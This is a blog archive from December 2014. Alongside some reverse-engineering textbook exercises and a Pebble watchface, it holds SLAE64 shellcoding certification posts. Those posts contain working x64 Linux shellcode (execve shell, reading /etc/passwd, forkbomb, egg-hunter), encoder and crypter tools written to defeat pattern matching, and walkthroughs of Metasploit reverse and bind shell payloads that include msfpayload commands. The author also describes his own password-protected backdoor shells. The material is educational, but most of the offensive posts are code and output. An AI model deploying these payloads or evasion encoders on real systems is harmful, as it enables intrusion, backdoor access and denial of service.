Wednesday, December 31, 2014

Practical Reverse Engineering p.17 #4

Question number 4 on page 17 of Practical Reverse Engineering is as follows:

In all of the calling conventions explained, the return value is stored in a 32-bit register (EAX). What happens when the return value does not fit in a 32-bit register? Write a program to experiment and evaluate your answer. Does the mechanism change from compiler to compiler?

Here is a C function which returns a value that is a 128-bit struct:

struct toolong {
    int a;
    int b;
    int c;
    int d;

struct toolong get_toolong()
    struct toolong t;

    t.a = 0xDABBAD00;
    t.b = 0xDEADBEEF;
    t.c = 0xBADF00D;
    t.d = 0xBA5EBA11;

    return t;

Here is what happens when it is compiled with: gcc -O3 -m32

; GCC 4.8.2

    mov    eax, dword ptr [esp+0x4]
    mov    dword ptr [eax], 0xdabbad00
    mov    dword ptr [eax+0x4], 0xdeadbeef
    mov    dword ptr [eax+0x8], 0xbadf00d
    mov    dword ptr [eax+0xc], 0xba5eba11
    ret    0x4

It is obvious that the return value of EAX is actually a pointer. The returned struct is stored on the stack.

The compiler for Microsoft Visual Studio 2013 produced essentially the same assembly, but with a full function frame. It was compiled with: /GS- /Gd /Gy /Ox

; MSVC 17.00.60610.1

    push    ebp
    mov     ebp, esp
    mov     eax, [ebp + 8]
    mov     dword ptr [eax], 0DABBAD00h
    mov     dword ptr [eax + 4], 0DEADBEEFh
    mov     dword ptr [eax + 8], 0BADF00Dh
    mov     dword ptr [eax + 0Ch], 0BA5EBA11h
    pop     ebp

Notice that the GCC compiler stores the struct at [ESP + 4] and MSVC at [EBP + 8]. This means space needs to be pre-allocated by the caller for each.

Practical Reverse Engineering p.17 #3

Question number 3 on page 17 of Practical Reverse Engineering is as follows:

In the example function, addme, what would happen if the stack pointer were not properly restored before executing RET?

    push ebp
    mov ebp, esp
    movsx eax, word ptr [ebp+8]
    movsx ecx, word ptr [ebp+0Ch]
    add eax, ecx
    mov esp, ebp
    pop ebp

In this case, the ESP register is not modified at all (through mathemetical operations or PUSH/POP), so does not need to be properly restored.

In most cases however, without a MOV ESP, EBP instruction in the function prologue, you would return to an address that is whatever data happens to be in the current stack pointer at the time. This can often mean a crash, or at the very least unexpected behavior.

Practical Reverse Engineering p.17 #2

Question number 2 on page 17 of Practical Reverse Engineering is as follows:

Come up with at least two code sequences to set EIP to 0xAABBCCDD.

One sequence would be to push that address and then return.


Another sequence would be to simply jump to the address.


You could also call the address.


Practical Reverse Engineering p.17 #1

Question number 1 on page 17 of Practical Reverse Engineering is as follows:

Given what you learned about CALL and RET, explain how you would read the value of EIP? Why can’t you just do MOV EAX, EIP?

You can't do MOV EAX, EIP because the instruction pointer is not readily accessible, likely as a security feature.

Here is one way you can get EIP (after the call) into another register.
    call geteip
    ; ...

    pop eax       ;eax = eip (_start + sizeof(call))
    ; push eax 
    ; ret

Tuesday, December 30, 2014

Practical Reverse Engineering p.11 #1

Question number 1 on page 11 of Practical Reverse Engineering is as follows:

1. This function uses a combination SCAS and STOS to do its work. First, explain what is the type of the [EBP+8] and [EBP+C] in line 1 and 8, respectively. Next, explain what this snippet does.

mov edi, [ebp+8]
mov edx, edi
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 2
neg ecx
mov al, [ebp+0Ch]
mov edi, edx
rep stosb
mov eax, edx

The first part of the question asks to define the types at [EBP+8] and [EBP+C].

For [EBP+8], we see it is moved into the EDI register a few instructions before REPNE SCASB. That instruction is generally used in string operations, in which EDI is the "destination index" of the operation. It is safe to assume that [EBP+8] is a byte buffer; the char* type.

Looking at [EBP+C], we see that it is moved into the AL register. This is an obvious hint to us that the value is a single byte; the char type.

So just by deducing the types and seeing their context, we have a vague idea of what is going on. The first half of the code sets ECX to -1, EAX to the null byte, then repeats over the buffer until the null byte is found (decrementing ECX for each byte before the null byte). Two is then added to ECX, and the register is turned into a positive number.

In the end, the first part of the code is the length of the buffer before the null byte. It's an implementation of the strlen() function. The second part of the code uses REP STOSB, which copies the AL register to the EDI register ECX times. This is the memset() function.

Here is the function in C:

/* cdecl */ 
char *asm_func(char *buffer, char byte)
   memset(buffer, byte, strlen(buffer));
   return buffer;

Sunday, December 28, 2014

Hex/Binary Pebble Watchface

My girlfriend got me the Pebble Steel smart watch for Christmas. The watch runs on an ARM Cortex M3 with a modified FreeRTOS kernel (which is described more as a threading library than a traditional operating system).

When I get a device like this I always have to poke around the API and see what it has to offer. So I looked at the getting started guide and wrote an app that simply displays the time and date in hexadecimal and binary forms.

The API is in C, and you only have access to a subset of the standard library. For instance, instead of doing itoa() with a base of two to display the numbers as binary, I had to create the following monstrosity:

const char *bytebin(int n, int m, char *b, int l)
    for (b[0] = '\0'; m > 0 && l > 0; m >>= 1, --l)
        strcat(b, ((n & m) == m) ? "1" : "0");
    return b;

And this is how I use it:

    snprintf(binDateBuffer, sizeof(binDateBuffer), "%s/%s/%s", 
           bytebin(tick_time->tm_mon + 1, 0x8, binMon, 4), 
           bytebin(tick_time->tm_mday, 0x10, binDay, 5), 
           bytebin(tick_time->tm_year + 1900, 0x400, binYr, 11));

The development IDE is hosted in the cloud. You literally just type in some C code and press play. The web application then compiles it and uploads it to your phone which sends it to the watch via Bluetooth. This lets you jump right into developing without any setup.

Friday, December 26, 2014

Architecture Detection (x86 or x64) Assembly Stub

This stub is useful for combining both a 32-bit and 64-bit shellcode payload into a single shot. Knowing the distinction in architecture is important for many types of payloads. For instance, on Windows the Thread Information Block is in the FS segment register on x86, and is in GS on x64.

Here are 5 bytes you you can use to detect the architecture you're on:


    xor ecx, ecx        ; set ecx to 0
    db 0x41             ; x86 opcode for: inc ecx

    loop x64_code       ; ecx now -1 in x64, we jmp

    ; use fs segment

    ; ret

    ; use gs segment

Those familiar with x64 assembly should recognize that the 0x40-0x50 range is often used as a prefix for an instruction.  We can use this subtle difference to confuse the processor. In this case, if running in x64, the inc ecx opcode becomes a prefix for the loop. The loop instruction decrements ecx by one, and if ecx is not equal to 0 it will jump to the given label.

I used db 0x41 instead of inc ecx in the source code, since nasm uses a modern 2-byte instruction to prevent this ambiguity when we actually want the 1-byte increment. Here are the different outputs, which clearly show what is going on:


 "\x31\xc9"              /* xor    %ecx,%ecx */
 "\x41"                  /* inc    %ecx */
 "\xe2\x01"              /* loop   x64_code  */     <-- ecx = 0, no jmp


 "\x31\xc9"              /* xor    %ecx,%ecx */
 "\x41\xe2\x01"          /* rex.B loop x64_code  */ <-- ecx = -1, jmp

Thursday, December 25, 2014

Final Thoughts on the SLAE64 Certification

As is obvious by my posts over the past few days, I was working on fulfilling the requirements of the x86/64 Assembly and Shellcoding on Linux class at SecurityTube/Pentester Academy to obtain the SLAE64 certification.

All I was seeking from doing this was to fill in the gaps in my knowledge. The course material was exceptional compared to my extremely basic assembly class at a Cal State, and it cost twenty times less. I liked that it makes you put your knowledge to the true test by completing 7 practical assignments of varying difficulty. I certainly have respect for others who have completed the certification.

Wednesday, December 24, 2014

x64 Egg-Hunter Shellcode Stager

The "egg-hunter" is a form of staged shellcode that is useful when you can inject a large payload into a process but aren't sure where in memory it will end up. If you can get the instruction pointer to point to a smaller, hunter code, you can search memory to find the main payload, which is prepended with a small tag of bytes (the egg). Egg-hunter code, even moreso than other shellcode, needs to be as small as possible.

Here is an example that assumes our main payload will be farther down the stack. Recall the stack grows toward lower addresses, so we will load the current stack pointer and increase it, going back toward higher addresses (the bottom of the stack). The egg is a simple 4-byte sequence that we are searching for, and we jump to what follows it.


egg equ  'z0x0'

global _start
section .text

    push rsp                  ; load current stack pointer
    pop rcx
    add rcx, 0xff             ; we need to skip our own code

    inc rcx                   ; higher addresses
    cmp dword [rcx - 4], egg
    jne hunt

    jmp rcx

This assembles down into a nice compact 20 bytes.


Remember RCX begins at the stack pointer, the start of our hunter shellcode. We don't want to accidently find the egg that is within our hunter shellcode (doing so in this case will result in an infinite loop). Since we know this shellcode is 20 bytes, we add 4 to it (since the compare subtracts 4) to skip completely over all of our own code, and dig deeper down into the stack. So in the final payload we can replace the addition of 0xff to RCX with 0x18 (decimal 24).

Finally, here is a C example that sets up a dirty stack, which has a local shell payload for the egghunter to find. It is compiled with: gcc -m64 -z execstack egghunt.c

int main(void)
    char egghunter[] =
        "\x54"                          /* push   %rsp */
        "\x59"                          /* pop    %rcx */
        "\x48\x83\xc1\x18"              /* add    $0x18,%rcx */
        "\x48\xff\xc1"                  /* inc    %rcx */
        "\x81\x79\xfc\x7a\x30\x78\x30"  /* cmpl   $egg,-0x4(%rcx) */
        "\x75\xf4"                      /* jne    6 hunt */
        "\xff\xe1"                      /* jmpq   *%rcx */;

    char stackgarbage[] = 

    char eggpayload[] = 
        "z0x0"                          /* egg */
        "\x31\xf6"                      /* xor    %esi,%esi */
        "\x48\xbf\xd1\x9d\x96\x91\xd0"  /* movabs $str,%rdi */
        "\x8c\x97\xff"                  /* . */
        "\x48\xf7\xdf"                  /* neg    %rdi */
        "\xf7\xe6"                      /* mul    %esi */
        "\x04\x3b"                      /* add    $0x3b,%al */
        "\x57"                          /* push   %rdi */
        "\x54"                          /* push   %rsp */
        "\x5f"                          /* pop    %rdi */
        "\x0f\x05"                      /* syscall */;

    (*(void(*)()) egghunter)();

    return 0;

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Monday, December 22, 2014

x64 Shellcode Byte-Rotate Encoder

Shellcode encoders are used to defeat basic pattern matching or remove bad bytes from a payload. I've written before about Metasploit's x64/xor encoder, which is pretty simple and very effective.

I wrote an encoder that rotates bytes. I decided to rotate 3 bits left when encoding, meaning the decoder needs to rotate right 3 bits. Here is the decoder logic:

    jmp encoded

    pop rbx         ; *rbx stores data

    xor ecx, ecx
    add cl, 0xff    ; replace with shellcode size

    ror byte [rbx + rcx], 0x3
    loop decode

    jmp rbx

    call getaddr

    ; db 0x.... encoded bytes go here

This resulted in the following 21 byte stub:


I created a python script that basically just rotates all the bits left by 3, and then prepends the decoder stub (changing the length in the cl register appropriately).

''' x64 Shellcode Bit-Rotate Encoder '''

def rol(byte, count):
    return (byte << count | byte >> (8 - count)) & 0xff

def hex_string(byte):
    return "\\" + hex(byte)[1 : ]

def rot_encode_vector(shellcode):
    encoded = []
    for byte in shellcode:
        encoded.append(rol(byte, 3))

    return encoded

def add_decoder_stub(encoded):
    decoder = "\\xeb\\x0e\\x5b\\x31\\xc9\\x80\\xc1\\x04"
    decoder += hex_string(len(encoded))
    decoder += "\\xc0\\x0c\\x0b\\x03\\xe2\\xfa\\xff\\xe3"
    decoder += "\\xe8\\xed\\xff\\xff\\xff"

    for byte in encoded:
        decoder += hex_string(byte)

    return decoder

def rot_encode(shellcode):
    shellcode_vector = shellcode.split('\\x')[1 : ]
    shellcode_vector = [int(y, 16) for y in shellcode_vector]

    encoded_vector = rot_encode_vector(shellcode_vector)
    complete = add_decoder_stub(encoded_vector)

    return complete, encoded_vector, shellcode_vector

if __name__ == '__main__':
    import argparse
    args = argparse.ArgumentParser(description='Bit-Rotate Encoder')
    args.add_argument('shellcode', help='shellcode to encode')

    argv = args.parse_args()

    out, encv, scv = rot_encode(argv.shellcode)

    print 'Original length: %d' % (len(scv))
    print argv.shellcode
    print 'Encoded length: %d' % (len(out) / 4)
    print out
    print 'db ' + ', '.join(map(hex, encv))

To run it, just enter the shellcode you want to use. Here is an example using a 32 byte execve local shell.

root@kali:~/SLAE64# python ./ "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"

Original length: 32

Encoded length: 53

db 0x42, 0x89, 0x6, 0x82, 0x42, 0xdd, 0x79, 0x13, 0x4b, 0x73, 0x79, 0x79, 0x9b, 0x43, 0x9a, 0x42, 0x4c, 0x3f, 0x82, 0x42, 0x4c, 0x17, 0xba, 0x42, 0x4c, 0x37, 0x42, 0x1c, 0x6, 0xd9, 0x78, 0x28

This bears very little resemblance to the original bytes, and looks like garbage code when disassembled.

"\x42\x89\x06"                  /* rex.X mov %eax,(%rsi) */
"\x82"                          /* (bad) */
"\x42\xdd\x79\x13"              /* rex.X fnstsw 0x13(%rcx) */
"\x4b\x73\x79"                  /* rex.WXB jae 99  */
"\x79\x9b"                      /* jns    ffffffffffffffbd */
"\x43\x9a"                      /* rex.XB (bad) */
"\x42"                          /* rex.X */
"\x4c\x3f"                      /* rex.WR (bad) */
"\x82"                          /* (bad) */
"\x42"                          /* rex.X */
"\x4c\x17"                      /* rex.WR (bad) */
"\xba\x42\x4c\x37\x42"          /* mov    $0x42374c42,%edx */
"\x1c\x06"                      /* sbb    $0x6,%al */
"\xd9\x78\x28"                  /* fnstcw 0x28(%rax) */

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Sunday, December 21, 2014

x64 Linux Polymorphic read file shellcode

There is a read file shellcode on shell-storm that is used to read the /etc/passwd file. On Linux, this lists users and groups and such, however password hashes are actually stored inside of the /etc/shadow file. Regardless, here is the contents of the shellcode:

; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start

section .text

    jmp _push_filename
; syscall open file
    pop rdi ; pop path value
    ; NULL byte fix
    xor byte [rdi + 11], 0x41
    xor rax, rax
    add al, 2
    xor rsi, rsi ; set O_RDONLY flag
; syscall read file
    sub sp, 0xfff
    lea rsi, [rsp]
    mov rdi, rax
    xor rdx, rdx
    mov dx, 0xfff; size to read
    xor rax, rax
; syscall write to stdout
    xor rdi, rdi
    add dil, 1 ; set stdout fd = 1
    mov rdx, rax
    xor rax, rax
    add al, 1
; syscall exit
    xor rax, rax
    add al, 60
    call _readfile
    path: db "/etc/passwdA"

This comes out to 82 bytes.


Here are the same system calls with the logic in a different fashion, which will defeat basic pattern matching.


    xor esi, esi
    mul esi

    push rdx    ; '\0'

    mov rcx, 0x6477737361702f63  ; 'c/passwd'
    push rcx

    mov rcx, 0x74652f2f2f2f2f2f  ; '//////et'
    push rcx

    push rsp
    pop rdi

    mov al, 0x2

    push rax
    pop rdi
    push rsp
    pop rsi
    push rdx
    push rdx        ; saving lots of 0's
    push rdx
    push rdx
    pop rax
    mov dx, 0x999

    pop rdi
    inc edi
    push rax
    pop rdx
    pop rax
    inc eax

    pop rax
    mov al, 60

The original code uses lots of mov operations, whereas this version accomplishes the same using the stack. Instead of using add to set RAX, it uses mov (although it could again also use the stack). The way a pointer to the string is obtained is also much different.

The final version comes out to 63 bytes, which is shorter than the original shellcode. This means we could add NOPs to be even more polymorphic.


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

x64 Linux Polymorphic execve() shellcode

There are many versions of execve shellcode for both x86 and x64 Linux. These work by executing some variation of the system call execve("/bin/sh", 0, 0), granting a local shell. Here is one of these shellcodes from shell-storm.
; [Linux/X86-64]
; Dummy for shellcode:
; execve("/bin/sh", ["/bin/sh"], NULL)
; hophet [at]

global _start
section .text

    xor rdx, rdx
    mov rbx, 0x68732f6e69622fff
    shr rbx, 0x8

    push rbx
    mov rdi, rsp
    xor rax, rax
    push rax
    push rdi
    mov rsi, rsp

    mov al, 0x3b

It assembles to 33 bytes, as follows:


Here is a polymorphic version which defeats pattern matching by changing the instructions, and rearranging the order things are done.


    xor esi, esi

    mov rdi, 0xff978cd091969dd1

    neg rdi
    mul esi

    add al, 0x3b

    push rdi
    push rsp
    pop rdi


The polymorphic version comes in at 24 bytes, which is actually shorter than the original. This means we could add NOPs to be even more polymorphic.


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

x64 Linux Polymorphic forkbomb shellcode

A forkbomb is an attack payload which causes the exploited program to create new instances of itself, in a permanent loop. The end result is basically a denial of service, as the program reproduces itself so many times that there are no more system resources left to use.

On shell-storm there is a simple 7 byte forkbomb shellcode for x86. Translated to x64, it would look something like this:

    push 0x39
    pop rax
    jmp short forkbomb

This gives us the following shellcode, also 7 bytes:


We can do some basic polymorphing of this code.

    shl eax, 0x40
    mov al, 0x38
    inc al
    jne forkbomb

This becomes 11 bytes, which is right around 150% of the size of the original. This will defeat basic pattern matching.


However, this still contains some of the same bytes, at the point of the syscall. I created the following polymorphic code to have a totally different footprint.

    lea rcx, [rel forkbomb]

    push rcx
    shl rax, 64
    mov al, 0x38
    inc al

    push 0xc359040e
    add word [rsp], 0x0101
    push rsp

It contains no bytes that are the same as the original. It uses encoding to disguise syscall. The only reason for the nop instruction is so that the RIP-relative addressing won't contain the byte \xf9, like the original shellcode.

The new payload is 29 bytes, null-free.


It sets up the stack as follows, then unmasks the syscall and returns:

[&rsp]                     <-- low address
[syscall - mask 0x0101]
[&forkbomb]                <-- high address

Different code, same result.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

x64 Shellcode One-Time Pad Crypter

I chose to use C++11 to create a shellcode crypter. I decided the following data structure is one that works well when dealing with shellcode in C++:

typedef std::vector<unsigned char> bytearr_t;

I had a bit of difficulty when trying to find an appropriate encryption method to use. I knew that I didn't want to use a block cipher, as the extra padding would only increase the length of the shellcode. Most of the stream ciphers have a number of attacks on them, and the ones that don't are pretty obscure.

 One stream cipher that is guaranteed to be cryptographically secure and cannot be cracked is a one-time pad. This type of encryption means that the key length is the same size as the data being encrypted. With a one-time pad, it is literally impossible to reverse the message without the right key, since the message can be any permutation of the same length. Here is how I generate a key:

bytearr_t generate_key(size_t len)
    std::random_device rd;
    std::mt19937 mt(rd());
    std::uniform_real_distribution<double> dist(0, 256);

    bytearr_t ret;

    for (auto i = 0; i < len; ++i)
        ret.push_back((unsigned char)dist(mt));

    return ret;

There are other ways to generate the key, but this one means we will always end up with something somewhat unique. Here is the encryption method which is a basic xor stream cipher:

bytearr_t one_time_xor(bytearr_t sc, bytearr_t key)
    bytearr_t ret;

    assert(sc.size() == key.size());

    for (auto i = 0; i < sc.size(); ++i)
        ret.push_back(sc[i] ^ key[i]);

    return ret;

You might be thinking, a simple xor is all that's being used? Well, you're not alone, and there are theoretical attacks on one-time pads. For instance, if someone knows our payload ends with syscall, they can easily change those bytes of the payload into something else. But if someone can garble that, they can garble anything, and prevent the payload from running in the first place, so we shouldn't be concerned. Even if we actually do have that information leak, the rest of the payload will still be unintelligible without the right key.

 The following example shows encryption of a simple local shell payload.

root@kali:~# g++ -std=c++11 -m64 -z execstack crypter.cpp

root@kali:~# ./a.out \x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05

Size: 24



root@kali:~# ./a.out -d \x69\x77\x89\xdd\x5a\x00\x4f\x89\xc7\xb4\x8e\xec\xc7\x05\x46\x33\x0b\x31\x27\xde\x2f\xe2\x71\x9d \x58\x81\xc1\x62\x8b\x9d\xd9\x18\x17\x38\x19\x13\x8f\xf2\x99\xc4\xed\x35\x1c\x89\x7b\xbd\x7e\x98


Press any key to execute...
# whoami

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Saturday, December 20, 2014

A Look at the linux/x64/shell_reverse_tcp Metasploit Payload

After I finished micro optimizing my reverse TCP port shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 74 bytes. My payload is 77 bytes, however mine doesn't contain any null-bytes. Metasploit's will always contain nulls, even if your IP and port do not.

Even though I was sad to see it contained null-byutes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_reverse_tcp LHOST= LPORT=4444 C
 * linux/x64/shell_reverse_tcp - 74 bytes

I threw this into a C file.

unsigned char sc[] = 

    (*(void(*)()) sc)();

I compiled it: gcc -m64 -z execstack msfreverse.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

Again as I saw in the bind shell version, I discovered they were able to shrink their register fixing and first syscall into 12 bytes, whereas mine was 13.  Here again is a high level look at what they did to accomplish this:

push   0x29
pop    rax
push   0x2
pop    rdi
push   0x1
pop    rsi

Next we come across an area with null-bytes. Since I used for the address, there are null-bytes. I got around this in my own shellcode by subtracting a mask, and adding it back when the shellcode is run.

One thing they did that was able to shrink the code considerably is enter all of the struct sockaddr in a single mov instruction.

0x000000000060088e in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088e <sc+14>:    movabs $0x100007f5c110002,%rcx

It looks like they actually end up with some pollution in their stack when the syscall is made.

(gdb) x/4xw $rsi
0x7fffffffe330:    0x5c110002    0x0100007f    0x004004bc    0x00000000

We can compare this to  my version, which cleans the stack first.
(gdb) x/4xw $rsi
0x7fffffffe328:    0x5c110002    0x0100007f    0x00000000    0x00000000

I ran both programs through strace, and got identical syscalls.

connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("")}, 16)

So I consulted the man page. It would appear these are optional bytes, and there may be a way to shrink my own shellcode at this point. I think I would be able to save 1 byte by not pushing and clearing this out.

The rest of the code is pretty standard for a reverse shell.  There's another null-byte when the "/bin/sh" string is put on the stack.

So just by looking at Metasploit's code I found at least two places I can further shrink my own code.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

A Look at the linux/x64/shell_bind_tcp Metasploit Payload

After I finished micro optimizing my bind TCP port shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 86 bytes and the payload always contains null-bytes, even if your port does not have one.  Even though the version I created already had 81 bytes, I thought there might be something to learn from Metasploit's version.

root@kali:~/# msfpayload linux/x64/shell_bind_tcp RPORT=4444 C
 * linux/x64/shell_bind_tcp - 86 bytes

I threw this into a C file.

unsigned char sc[] =

    (*(void(*)()) sc)();

I compiled it: gcc -m64 -z execstack msfbind.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

I discovered they were able to shrink their register fixing and first syscall into 12 bytes, whereas mine was 13.  Here is a high level look at what they did to accomplish this:

push   0x29
pop    rax
push   0x2
pop    rdi
push   0x1
pop    rsi

You can compare that with my version, which uses the xor esi, esi and mul esi to clear 3 registers.  Here the same is done with cdq to clear out the pollution, and then qword pushes popped directly into the registers. In a future release of my own shellcode I would make this change.

Next though, we come across one of the first instances of a null-byte.  It is part of the struct sock_addr that is used, where the port and address family is specified.

0x000000000060088f in sc ()
7: /x $rdi = 0x7
6: /x $rsi = 0x1
5: /x $rdx = 0x0
4: /x $rcx = 0xffffffffffffffff
3: /x $rbx = 0x0
2: /x $rax = 0x2
1: x/i $rip
=> 0x60088f <sc+15>:    movl   $0x5c110002,(%rsp)

When I was writing my own shellcode, I had to make a sacrifice. I probably could have shrunk even more bytes if I didn't make the PORT configurable.  However, doing so may be the reason I went about things differently, and 0'd out that area of the struct by pushing a 0 register twice. This is definitely less bytes, but of course has the null.

The next parts of this shellcode are all pretty standard.  I didn't see too much more I could do in terms of shrinkage, and my own execution was very similar to this payload's.

I did want to point out another area though where the null-byte is used, as the terminator for the "/bin/sh" string. I got around this by first pushing a 0 register on the stack, and then naming the string "//bin/sh" to fill in the extra byte.

(gdb) x/i $rip
=> 0x6008c1 <sc+65>:    movabs $0x68732f6e69622f,%rbx
(gdb) x/3x $rip
0x6008c1 <sc+65>:    0x622fbb48    0x732f6e69    0x48530068
(gdb) .

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

A Look at the x64/xor Metasploit Encoder

After I finished micro optimizing my reverse TCP shellcode, I remembered that Metasploit offers one. The msfpayload generated one which weighs in at 74 bytes. It would seem better than my 77 byte shellcode, except this comes with a price. The payload always contains null-bytes, even if your IP does not have .0's in it. This means you won't have as much luck exploiting string buffers as a completely null-free version would.

I found that to generate a null-free reverse TCP payload with Metasploit I had to use the encoder, and there only appears to be a single encoder explicitly for x64. The final payload size is 119 bytes.

root@kali:~/.ssh# msfpayload linux/x64/shell_reverse_tcp LHOST= LPORT=4444 R | msfencode -t c -e x64/xor -b '\x00'
[*] x64/xor succeeded with size 119 (iteration=1)

I threw this into a C file.

unsigned char sc[] =

    (*(void(*)()) sc)();

I compiled it: gcc -m64 -z execstack msfencoded.c

I then started up: gdb ./a.out

0x00000000004004ba in main ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0x0
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x4004ba <main+14>:    callq  *%rdx

This is where the call into our shellcode begins. It starts out by setting RCX to 0xa. It then does RIP-relative addressing to load into RAX where it needs to start decoding from.

0x000000000060088a in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0x0
2: /x $rax = 0x0
1: x/i $rip
=> 0x60088a <sc+10>:    lea    -0x11(%rip),%rax        # 0x600880 <sc>

Next, 0xa5540b36550a8b64 is moved into RBX. This is xored at [RAX + 0x27].

0x000000000060089b in sc ()
7: /x $rdi = 0x1
6: /x $rsi = 0x7fffffffe428
5: /x $rdx = 0x600880
4: /x $rcx = 0xa
3: /x $rbx = 0xa5540b36550a8b64
2: /x $rax = 0x600880
1: x/i $rip
=> 0x60089b <sc+27>:    xor    %rbx,0x27(%rax)

Eight bytes are then subtracted from RAX and the loop starts back at the XOR continues.  Once the loop finishes, we find ourselves directly at the pre-encoded payload.

This is clearly a very simple encoder.  Here's what the full code looks like:

    xor rcx, rcx
    sub rcx, 0xfffffffffffffff6
    lea rax, [rip + 0xffffffffffffffef] 
    mova rbx ,0xa5540b36550a8b64

    xor qword ptr [rax+0x27], rbx
    sub rax, 0xfffffffffffffff8
    loop decode

    db 0x...

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

x64 Linux reverse TCP connect shellcode (75 to 83 bytes, 88 to 96 with password)

A "reverse" TCP shellcode is a payload that once executed connects to a remote socket, and pipes all stdin, stdout, and stderr to a local /bin/sh shell. This allows an attacker to gain a backdoor onto the computer.

Reverse shells are more effective than using a bind shell, as often incoming ports are blocked by a firewall while outgoing ports are generally free to travel.

UPDATE: The latest version is now 75 to 83 bytes, 88 to 96 with password.

The smallest reverse shell available that I can find is Metasploit, coming in at 74 bytes.  However, Metasploit's version contains null-bytes, which means it isn't very useful in a lot of exploits. In order to remedy this, you have to encode the payload, making it weigh in at 119 bytes.

My version is 77 bytes, or 85 if the IP address itself contains null-bytes (such as the well-known localhost What I do is subtract a mask from the IP, and add it back in during the shellcode's execution.  Of course, my payload also comes with an optional 4 byte one-shot password, which if used means it will be 90 to 98 bytes.

You can find the code at:
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Sunday, December 14, 2014

x64 Linux bind TCP port shellcode (80 bytes, 95 with password)

A "bind shell" is an open port on a machine that copies stdout and stdin to the socket, and executes a shell. When shellcode can be injected into a vulnerable process, this lets an attacker place a backdoor on the computer.

It's well known that one of the best repositories for shellcode on the web is at shell-storm. At the time of writing, the shortest x64 bind shell is 132 bytes, and password protected is 147 bytes. My shellcode is 81 bytes, and 96 with a password. Though this is pretty significant, I still think my code can be shrunk, and welcome any suggestions.

UPDATE: The most recent version is now 80 bytes, 95 with password.

You can find the code at:
My main strategy for reducing the amount of bytes was to figure out which 32-bit instructions automatically get promoted to 64-bit without too much consequence. The reason for this is oftentimes the 64-bit instructions require an additional byte so the processor knows it's 64-bit mode.

I also tried to figure out where I could cut corners when it came to the syscalls. For example, I didn't set the max client backlog setting when I bound the port (leaving it 0). Intuitively, this means that it shouldn't allow any connections, however Linux goes back to a default setting which will allow us to get on the box. 

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE64 - 1360

Friday, December 12, 2014

Why 4 Bytes for a One-shot Password is Reasonably Secure

I was recently thinking about how much entropy a single-shot password would need to be reasonably secure. I concluded 4 bytes of data is enough, and will explain my reasoning.

I should provide some context and define what a single-shot password is. Consider we are exploiting a vulnerability in a service on an open port, and can inject shellcode to be ran. All outgoing traffic from this machine is being blocked, or perhaps there are other reasons we don't want to send a reverse, outgoing shell. We instead want to bind a shell to a new port on the machine so that we can gain a foothold onto the machine and into the network.

We don't want anyone else who sees the open port to have unauthenticated access to our backdoor. Anyone attempting to connect gets one attempt at the password, and if they fail the listening port will close. Forever. We need to keep our shellcode minimal, so using a long passphrase is not going to fly when we inject our exploit.

I consider 4 bytes of data for a single-shot password in this instance to be "reasonably" secure. Of course "reasonably" is subjective, and I am sure there will be detractors to this statement and I would be interested in hearing their discourse. However, I will explain my own reasoning and back it with some simple mathematics.

Let me first say that a 4 byte password, in most contexts, is incredibly insecure. No matter what hashing mechanism or other protections are applied to it, it can probably be cracked within minutes or seconds. However, in a single-shot context, this type of attack on our password is not possible.

Now let's consider the 4-byte passwords that most people use daily. They're used from everything like bank account PIN numbers to "the last 4 digits of your social security number". Typically these passwords are strictly numerical, which does not provide much entropy at all. The set of 0 to 9 for each byte, 10 possibilities, combined 4 times.

